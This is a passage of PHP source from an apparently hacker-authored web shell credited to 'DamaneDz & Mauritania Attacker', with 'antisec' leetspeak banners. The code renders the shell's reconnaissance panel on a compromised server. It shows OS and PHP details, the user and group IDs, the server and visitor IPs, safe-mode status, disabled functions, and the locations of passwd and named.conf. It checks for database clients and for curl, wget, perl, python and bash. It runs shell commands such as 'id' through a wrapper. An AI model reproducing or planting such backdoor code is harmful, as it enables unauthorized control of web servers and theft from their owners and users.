<font color=#000 size=2px>
<center><span><font color='#111'>
<br> UName -a: <font color=blue>".@php_uname()." </font>|</br>
<br> Hostname: <font color=blue>".$_SERVER['HTTP_HOST']."</font>|</br>
<br> Software : <font color=blue>".@getenv("SERVER_SOFTWARE")." </font>| </br>
<br> PHP Version: <font color=blue>".@phpversion()." </font>|</br>
<br> Current Dir: <font color=blue>{$pwd} |</font></br>
<br> ID:<font color=blue>" .@getmyuid()."(".@get_current_user().") </font>- UID:<font color=blue>".@getmyuid()."(".@get_current_user().") </font>- GID:<font color=blue>".@getmygid()."(".@get_current_user().") </font>|</br>
<br> Your IP:<font color=blue>".$_SERVER["REMOTE_ADDR"]." </font>| The Server IP:<font color=blue>".@gethostbyname($_SERVER["HTTP_HOST"])." </font>|</br>
<br> Safe Mode: $hsafemode | Open_BaseDir: ".openbase_dir()."|</br>
<br> Disabled Functions: ".@showdisablefunctions()."|</br>
<br> named.conf File is: ".named_conf()." | passwd File is: ".passwd()."</br>
<br>
MySQL: ".@testmysql()."|
MSSQL: ".@testmssql()."|
Oracle: ".@testoracle()."|
PostgreSQL: ".@testpostgresql()."|
cURL: ".@testcurl()."|
Fetch: ".@testfetch()."|
WGet: ".@testwget()."|
Perl: ".@testperl()."|
Python: ".@testpy()."|
Bash: ".@testsh()."|
</center>
</font>
<br/>
</div>
<p align='center'><font color='#FF00FF'>By DamaneDz & Mauritania Attacker<br/></font></p>
<br/>
";
?>
 echo $html_start;
 echo "<div class=barheader2><h3>{$sh_name}</h3>| pr0j3c7 m4yh3m | 4n71-s3c m0v3m3n7 | f**k wh173h475 |</div>\n";
 echo "<table id=pagebar><tr><td width=50%><p>" . "50f7w4r3 : " . $DISP_SERVER_SOFTWARE . " - <a href=" . $surl . "antisec=phpini>php.ini</a><br>" . "{$hsafemode}<br>" . "OS : " . php_uname() . "<br>";
 if (!$win) {
     echo "Us3r 1D : " . s3x3c("id");
 } else {
     echo "User : "******"</p></td>" . "<td width=50%><p>53rv3r 1P : <a href=http://whois.domaintools.com/" . gethostbyname($_SERVER["HTTP_HOST"]) . ">" . gethostbyname($_SERVER["HTTP_HOST"]) . "</a> - " . "Y0ur 1P - h1d3 17 v14 t0r n37w0rk : <a href=http://whois.domaintools.com/" . $_SERVER["REMOTE_ADDR"] . ">" . $_SERVER["REMOTE_ADDR"] . "</a><br>";
 if ($win) {
     echo "Dr1v3s : " . disp_drives($d, $surl) . "<br>";
 }
 echo "Fr33sp4c3 : " . disp_freespace($d);
 echo "</p></td></tr>";
 echo "<tr><td colspan=2><p>";
 echo "MySQL: " . testmysql() . " MSSQL: " . testmssql() . " Oracle: " . testoracle() . " MSSQL: " . testmssql() . " PostgreSQL: " . testpostgresql() . " cURL: " . testcurl() . " WGet: " . testwget() . " Fetch: " . testfetch() . " Perl: " . testperl() . "<br>";
 echo "Disabled Functions: " . showdisablefunctions();
 echo "</p></td></tr>";
 echo "<tr><td colspan=2 id=mainmenu>";
 if (count($quicklaunch2an) > 0) {
     foreach ($quicklaunch2an as $item) {
         $item[1] = str_replace("%d", urlencode($d), $item[1]);
         $item[1] = str_replace("%sort", $sort, $item[1]);
         $v = realpath($d . "..");
         if (empty($v)) {
             $a = explode(DIRECTORY_SEPARATOR, $d);
             unset($a[count($a) - 2]);
             $v = join(DIRECTORY_SEPARATOR, $a);
         }
         $item[1] = str_replace("%upd", urlencode($v), $item[1]);
         echo "<a href=\"" . $item[1] . "\">" . $item[0] . "</a>\n";